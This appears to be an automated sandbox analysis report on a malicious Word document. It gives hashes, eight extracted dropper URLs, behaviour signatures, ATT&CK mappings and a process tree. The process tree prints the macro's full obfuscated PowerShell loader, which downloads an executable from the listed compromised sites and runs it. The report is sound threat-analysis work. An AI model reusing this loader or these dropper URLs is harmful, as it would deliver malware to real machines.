Analysis

  • max time kernel
    19s
  • max time network
    21s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    28-10-2020 11:22

General

  • Target

    cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995.doc

  • Size

    241KB

  • MD5

    270f03e3d9fef36f88e51dd5dfec47c1

  • SHA1

    79874b79923b7ea19a4d5caa9c8512767e9a4285

  • SHA256

    cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995

  • SHA512

    53c2fac1ef4b5f70eb0a77ff0359e226fabd533e2828b97f90ab4aa1f8a35572fffb7be07efb3775abf9df7ad67539890912429b7a75b901a711264b28ef90d4

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://nanettecook.org/wp-admin/x/

exe.dropper

http://scalarmonitoring.com/wp-admin/js/widgets/S0A/

exe.dropper

https://fourseasonsjsc.com/wp-admin/hzu9vvt/

exe.dropper

https://ningyangseo.com/wp-admin/am/

exe.dropper

https://www.rapidcarwash.net/wp-content/nO6U/

exe.dropper

http://coolchacult.com/wp-includes/i/

exe.dropper

http://anpbodysculpting.com/wp-content/themes/twentytwenty/c/

exe.dropper

https://lamajesteindustries.com/wp-content/DRTujMR/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3980
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD s E t - I t E M   v a r I A B L e : N 5 9 O m     (   [ t Y p E ] ( " { 1 } { 4 } { 0 } { 2 } { 3 } { 5 } " - F   ' m . I ' , ' S y ' , ' o . d i ' , ' r e c t o R ' , ' S T e ' , ' Y ' ) )   ;     s E T   ( ' x 2 ' + ' i ' )   ( [ t Y p E ] ( " { 5 } { 4 } { 3 } { 1 } { 2 } { 0 } { 6 } "   - f   ' A ' , ' I c E p O I ' , ' n t M ' , ' V ' , ' r ' , ' S Y s t e M . n E T . s E ' , ' n A G e R ' )   )   ;     $ R u s v c x v = ( ' U l ' + ( ' 1 ' + ' p 2 p 0 ' ) ) ; $ K 0 u l p n e = $ T 0 0 3 8 r g   +   [ c h a r ] ( 6 4 )   +   $ E 9 6 m k f 8 ; $ Z w x 6 6 t 0 = ( ( ' I 9 f ' + ' v ' ) + ( ' x ' + ' 0 h ' ) ) ;     (     g E t - V A R I a b l E     N 5 9 O M   - v a l u e O n l y ) : : " C ` R e A T ` E D I r e ` c ` T o R y " ( $ H O M E   +   ( ( ( ' m ' + ' t z D 8 ' + ' c 9 8 n ' ) + ' n ' + ( ' m t z O s ' + ' s ' ) + ' 0 ' + ( ' 8 b _ ' + ' m t z ' ) ) - r e P L A C E     ( [ C H a R ] 1 0 9 + [ C H a R ] 1 1 6 + [ C H a R ] 1 2 2 ) , [ C H a R ] 9 2 ) ) ; $ O g h 9 d i c = ( ' J h ' + ( ' p f 3 ' + ' i ' ) + ' 6 ' ) ;     (   V A r i A b L E     ( ' X 2 ' + ' i ' )   - V a l U e ) : : " s ` e C ` U R i t y ` p R O T O C O l "   =   ( ( ' T ' + ' l s ' ) + ' 1 2 ' ) ; $ K m q e 4 d r = ( ' Z q ' + ( ' q ' + ' 0 m v ' ) + ' y ' ) ; $ R 7 _ c y 0 p   =   ( ' T ' + ( ' 1 4 ' + ' e ' ) + ' 0 0 ' ) ; $ T u p r x e 5 = ( ( ' B ' + ' c r ' ) + ( ' g ' + ' k s c ' ) ) ; $ L z 0 0 x 4 d = ( ' U ' + ( ' u g p ' + ' b q 2 ' ) ) ; $ Y 7 e d n l 2 = $ H O M E + ( ( ' { 0 } D ' + ( ' 8 ' + ' c 9 ' ) + ' 8 n n { ' + ' 0 } O s ' + ' s 0 8 b _ { ' + ' 0 } ' ) - F   [ C H A R ] 9 2 ) + $ R 7 _ c y 0 p + ( ( ' . ' + ' e x ' ) + ' e ' ) ; $ L c z v n x 5 = ( ' E 1 ' + ' n 8 ' + ( ' 6 ' + ' p n ' ) ) ; $ Z g l a 5 a r = . ( ' n e w - o b j ' + ' e c ' + ' t ' )   n e T . W e B c L I e N T ; $ G l 6 g 5 7 e = ( ( ( ( ' h t t p ' + ' : ] [   ' + ' ( 0 ' + '   h ' + ' u ' + ' B J   [ ]   ' + ' [ ] w ] ' + ' [   ( ' + ' 0   h ' + ' u B J   [ ' + ' ] ' + '   [ ] w n a n e t ' + ' t ' + ' e c o o ' ) ) + ( ( ' k . o r g ' + ' ] [ ' + '   ( ' + ' 0 ' + '   h u ' + ' B J   ' + ' [ ] ' + '   [ ] w w p - a ' + ' d m i n ' + ' ] ' + ' [   ( ' + ' 0   h ' + ' u B ' + ' J   [ ' + ' ]   [ ' + ' ] w x ' + ' ] [   ( 0   h ' + ' u B J ' + '   [ ]   [ ] w @ h ' + ' t t ' + ' p : ' + ' ] [   ( 0 ' ) ) + ( '   h u B J   [ ' + ' ]   [ ' + ' ] ' ) + ( ( ' w ] [   ( 0   h u ' + ' B J   [ ' + ' ] ' + '   ' + ' [ ] ' + ' w s c ' + ' a l a r m ' ) ) + ( ( ' o n i t o r i n g ' + ' . ' + ' c ' + ' o m ' + ' ] [   ( 0 ' + '   ' + ' h ' + ' u B J   ' + ' [ ] ' + '   [ ] ' + ' w ' + ' w p - ' + ' a d m i ' + ' n ' + ' ] [ ' + '   ( 0   h u ' + ' B J   [ ]   [ ] w j s ] ' + ' [ ' + '   ( 0   h u B J   [ ] ' + '   ' + ' [ ] w ' + ' w i d ' + ' g e ' ) ) + ( ( ' t s ' + ' ] ' + ' [   ( 0   h u B J   [ ' + ' ]   [ ] w ' ) ) + ( ( ' S 0 A ] ' + ' [ ' + '   ( ' ) ) + ( ( ' 0 ' + '   h u B ' + ' J ' + '   [ ]   [ ] w @ h t t ' + ' p s : ] [ ' + '   ( 0 ' + '   h u ' + ' B J ' + '   [ ]   [ ] w ' + ' ] [   ' + ' ( ' + ' 0   h u ' + ' B ' + ' J   [ ' + ' ]   [ ' + ' ] ' + ' w f o u r s e a s o n ' + ' s j ' + ' s c ' + ' . ' + ' c o ' + ' m ] ' + ' [   ( 0   ' + ' h ' ) ) + ( ' u B J   ' + ' [ ' ) + ( ( ' ] ' + '   [ ] w w p - a ' + ' d m i ' + ' n ] [   ( 0   h ' + ' u B ' + ' J   ' ) ) + ( ' [ ]   [ ' + ' ] w h ' + ' z u ' + ' 9 v v t ' ) + ( ( ' ] [   ' + ' ( 0   h ' ) ) + ( ' u B J   [ ]   [ ] w ' + ' @ ' + ' h ' ) + ( ' t t ' + ' p ' ) + ( ( ' s : ] ' + ' [ ' + '   ( 0   h u ' + ' B J   [ ' + ' ] ' + '   [ ] w ' + ' ] [ ' ) ) + ( ( '   ( ' + ' 0   h u B J   [ ]   [ ' + ' ] w ' + ' n i n g y a n ' + ' g s e o . c o ' + ' m ' + ' ] ' + ' [ ' + '   ( 0 ' + '   h u B ' + ' J ' + '   [ ]   [ ] ' + ' w w p - a ' + ' d m i ' + ' n ] [ ' + '   ( 0   h ' + ' u B J   [ ]   [ ] w a ' + ' m ] [   ( ' + ' 0   ' + ' h ' + ' u B J   [ ' + ' ]   [ ] w @ ' + ' h t t p ' + ' s : ] [   ( 0 ' + '   h u B J ' + '   [ ]   [ ] ' + ' w ] ' + ' [   ' + ' ( 0   ' + ' h u B J   [ ' ) ) + ( ' ] ' + '   [ ' + ' ] w w ' + ' w ' + ' w . ' + ' r a p i d c a r w a ' ) + ( ' s ' + ' h . ' ) + ( ( ' n ' + ' e t ] [   ' + ' ( 0   h u B ' + ' J ' + '   [ ] ' + '   [ ] w w p - c o n t e n ' + ' t ] [   ( 0   h u B J   [ ]   [ ' + ' ] w n O 6 U ] ' + ' [   ( 0   h u B J   ' + ' [ ]   [ ' + ' ] w ' + ' @ h ' + ' t t p : ' ) ) + ( ( ' ] ' + ' [ ' + '   ( 0   ' + ' h ' + ' u ' + ' B ' + ' J   [ ' + ' ]   [ ] w ] [   ( 0   h u B J ' + '   [ ] ' + '   [ ] ' ) ) + ( ' w ' + ' c o ' + ' o l c h ' ) + ( ( ' a c u l t . c o m ] [ ' + '   ( 0   h ' + ' u ' + ' B ' + ' J   [ ]   [ ] w w p ' ) ) + ( ( ' - i ' + ' n c l u ' + ' d e s ' + ' ] [ ' + '   ( 0   h u ' + ' B ' + ' J   [ ]   ' + ' [ ' + ' ] w i ' + ' ] ' + ' [   ( 0   h ' + ' u B J   ' + ' [ ]   [ ] ' ) ) + ( ( ' w @ h t t p ' + ' : ' + ' ] [   ' + ' ( 0   ' ) ) + ( ' h u ' + ' B J   [ ] ' + '   ' + ' [ ] w ] ' ) + ( ( ' [ ' + '   ( 0   h u B J   ' + ' [ ]   [ ] ' + ' w a n p b ' + ' o ' ) ) + ' d ' + ( ( ' y s ' + ' c u l ' + ' p t i n g . c o ' + ' m ] [ ' + '   ' + ' ( 0 ' ) ) + ( ( '   h ' + ' u B J ' + '   [ ' + ' ]   [ ] w w p - c o ' + ' n t ' + ' e n t ] [   ( ' + ' 0   h u B J   [ ]   [ ] w ' + ' t h e m e s ' + ' ] [   ( 0   ' + ' h u B J   [ ]   [ ] w t w e ' + ' n ' + ' t y t ' + ' w e n t y ] [   ( 0   h ' + ' u ' + ' B J   [ ]   [ ' ) ) + ( ( ' ] ' + ' w c ' + ' ] ' + ' [   ' + ' ( 0   h u B J   [ ' + ' ]   [ ] w @ h t t p s : ] [   ' + ' ( 0 ' + '   h ' + ' u ' ) ) + ( ( ' B ' + ' J   ' + ' [ ]   [ ] w ] [   ( 0 ' + '   h u B J   ' + ' [ ] ' + '   [ ] w ' + ' l a m a j e s ' + ' t e i n d u s t ' ) ) + ( ( ' r i ' + ' e ' + ' s . ' + ' c o m ' + ' ] [   ( 0   h u B J   [ ]   [ ] w w p ' + ' - c o ' + ' n t e ' + ' n t ] [ ' + '   ( 0   h u B ' + ' J ' + '   [ ]   [ ] ' + ' w D R T ' + ' u ' + ' j M R ] ' + ' [   ( 0 ' + '   ' + ' h u B J   [ ' ) ) + ( ' ]   [ ] ' + ' w ' ) ) ) . " R e p L A ` c E " ( ( ( ' ] [ ' + ( ( '   ( ' ) ) + ' 0 ' + ( '   h u ' + ' B J   ' + ' [ ] ' ) + ( '   ' + ' [ ] ' ) + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " S ` P l I T " ( $ R n n p _ _ x   +   $ K 0 u l p n e   +   $ M t z d 9 p z ) ; $ I 3 1 h 4 s _ = ( ( ' W 6 ' + ' 4 9 ' ) + ' p g ' + ' b ' ) ; f o r e a c h   ( $ X d x f d 0 b   i n   $ G l 6 g 5 7 e ) { t r y { $ Z g l a 5 a r . " d O W N L ` O a D F I ` L e " ( $ X d x f d 0 b ,   $ Y 7 e d n l 2 ) ; $ F r 2 y d l 2 = ( ( ' L 3 d ' + ' 6 9 2 ' ) + ' g ' ) ; I f   ( ( & ( ' G e ' + ' t - I t ' + ' e m ' )   $ Y 7 e d n l 2 ) . " L ` e n g ` T H "   - g e   4 5 0 0 2 )   { ( [ w m i c l a s s ] ( ' w ' + ' i n ' + ' 3 ' + ( ' 2 ' + ' _ P r o ' ) + ( ' c e s ' + ' s ' ) ) ) . " C R ` E A T e " ( $ Y 7 e d n l 2 ) ; $ T v d z f 8 g = ( ( ' O u ' + ' e ' ) + ' h z ' + ' t k ' ) ; b r e a k ; $ I 7 r y a u a = ( ' G ' + ( ' 2 b ' + ' o e 7 ' ) + ' e ' ) } } c a t c h { } } $ B 7 z w 0 y b = ( ( ' O ' + ' k t 3 ' ) + ' w ' + ' j 2 ' ) 
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1628
  • C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
    C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:2260

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
    MD5

    6671fa4366ca0baf6873286cf0192345

    SHA1

    4e55892a5cc2a6aae6f4ca89e291672f7d8c4b80

    SHA256

    0d56ec55e8ef45cc6cb5e0c49100f09493b1d6aacd69e774af8ea0e7c9ea5ec9

    SHA512

    2fe09b1fff8295649b770d60916ef4050ac0312f49046583b4bc1a62b2e5480659ca350e23dda53438fcd5eefb58106b31bab29a14e132a016a48168df912a12

  • C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
    MD5

    6671fa4366ca0baf6873286cf0192345

    SHA1

    4e55892a5cc2a6aae6f4ca89e291672f7d8c4b80

    SHA256

    0d56ec55e8ef45cc6cb5e0c49100f09493b1d6aacd69e774af8ea0e7c9ea5ec9

    SHA512

    2fe09b1fff8295649b770d60916ef4050ac0312f49046583b4bc1a62b2e5480659ca350e23dda53438fcd5eefb58106b31bab29a14e132a016a48168df912a12

  • memory/1628-8-0x00007FF8D4420000-0x00007FF8D4E0C000-memory.dmp
    Filesize

    9.9MB

  • memory/1628-9-0x0000018874E00000-0x0000018874E01000-memory.dmp
    Filesize

    4KB

  • memory/1628-10-0x0000018875180000-0x0000018875181000-memory.dmp
    Filesize

    4KB

  • memory/3980-0-0x00007FF8DBB00000-0x00007FF8DC137000-memory.dmp
    Filesize

    6.2MB

  • memory/3980-4-0x00000292DCDD8000-0x00000292DCDDD000-memory.dmp
    Filesize

    20KB